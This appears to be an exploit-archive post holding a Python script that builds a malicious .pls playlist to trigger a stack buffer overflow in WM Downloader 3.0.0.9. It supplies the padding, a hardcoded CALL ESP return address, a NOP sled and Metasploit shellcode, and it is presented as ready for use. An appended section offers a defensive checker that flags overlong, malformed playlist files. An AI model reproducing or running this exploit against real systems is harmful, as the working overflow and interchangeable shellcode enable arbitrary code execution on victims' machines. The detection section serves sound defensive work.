WM Downloader 3.0.0.9 (.pls) Buffer Overflow Exploit
Source: fb.com/TN.spl0it3r  Author: Tunisian  Published: 2012-04-10
#+----------------------------------------------------------------------+
# Exploit Title: WM Downloader 3.0.0.9 (.pls) Buffer Overflow Exploit
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Tested on: windows XP sp2
# Greetz: Milw0rm 1337day.com
# 
#	 ____ (_) ____   ___
#	(  _ \| |(  _ \ / _ \
#	| | | | || | | x |_|
#	| ||_/|_|| ||_/ \___/
#	|_|      |_|
#	 _ 
#	(_)  ____   ____  ____     _____ 
#	| | /  __| /  __| \__ \   /  `  \ 
#	| | \___ \ \___ \  / _ \_ | Y Y  \
#	|_| |____/ |____/ (___  / |_|_|  /
#						  \/       \/                          
#+----------------------------------------------------------------------+
#!/usr/bin/python

import sys,os
print "###############################################"
print "#           WM Downloader 3.0.0.9             #"
print "#             Tunisian_spl01t3r               #"
print "#           tn.spl01t3r@gmail.com             #"
print "#             fb.com/TN.spl0it3r              #"
print "###############################################\r\n"

file=open('iss.pls','w')
buffer="\x41" * 26113   
eip="\xF0\x69\x83\x7C"   # 7C8369F0 CALL ESP kernel32.dll
nops="\x90" * 30     

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
shellcode = (
	"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
	"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"
	"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"
	"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"
	"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"
	"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"
	"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"
	"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"
	"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"
	"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba")
	   
file.write(buffer+eip+nops+shellcode)
file.close()   # close the handle so the output is flushed to disk
print "\n [+] 3vil File Created  \n\n"
print "\n   enj0y ;)  \n\n"
raw_input("[+] Press any key to exit...")


#+----------------------------------------------------------------------+
#[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
#       jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
#	   
#	                      mAhna mAhna 
#	   
#[+] profile :  www.facebook.com/TN.spl0it3r    
#
#+----------------------------------------------------------------------+
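
From the defender's side, the file this script writes is one unbroken line of more than 26,000 bytes with no playlist structure, which is easy to flag before a player opens it. The following triage check is an added example, not part of the original post; the thresholds `MAX_LINE` and `MAX_RUN`, the finding codes and both sample inputs are assumptions constructed for illustration.

```python
# Added example, not from the original page: static triage of .pls playlists.
# MAX_LINE and MAX_RUN are assumed thresholds, not values from any product.
MAX_LINE = 2048   # playlist lines are short paths or URLs
MAX_RUN = 64      # longest tolerated run of one repeated byte

def longest_run(buf: bytes) -> int:
    """Length of the longest run of a single repeated byte value."""
    best = cur = 0
    prev = None
    for b in buf:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best

def triage_pls(data: bytes) -> list:
    """Return (line_no, code, detail) findings; an empty list means nothing flagged."""
    findings = []
    lines = data.splitlines()
    # A well-formed PLS file opens with the [playlist] section header.
    first = next((l.strip() for l in lines if l.strip()), b"")
    if first.lower() != b"[playlist]":
        findings.append((0, "missing-header", first[:16]))
    for no, line in enumerate(lines, 1):
        if len(line) > MAX_LINE:
            findings.append((no, "overlong-line", len(line)))
        if any(b < 0x20 and b != 0x09 for b in line):
            findings.append((no, "control-bytes", None))
        try:
            line.decode("utf-8")
        except UnicodeDecodeError:
            findings.append((no, "not-utf8", None))
        run = longest_run(line)
        if run > MAX_RUN:
            findings.append((no, "repeated-byte-run", run))
    return findings

# Constructed samples: a normal playlist, and inert filler laid out like the
# file the generator on this page writes (26113 filler bytes, 4 bytes, padding).
BENIGN = (b"[playlist]\r\nFile1=http://example.com/stream.mp3\r\n"
          b"Title1=Example\r\nLength1=-1\r\nNumberOfEntries=1\r\nVersion=2\r\n")
MALFORMED = b"A" * 26113 + b"BBBB" + b"\x90" * 30

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, triage_pls(sample))
```

The `not-utf8` check is a heuristic: playlists saved in a legacy code page will also trip it, so treat it as a signal to combine with the length and repeated-byte findings rather than a verdict on its own.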



 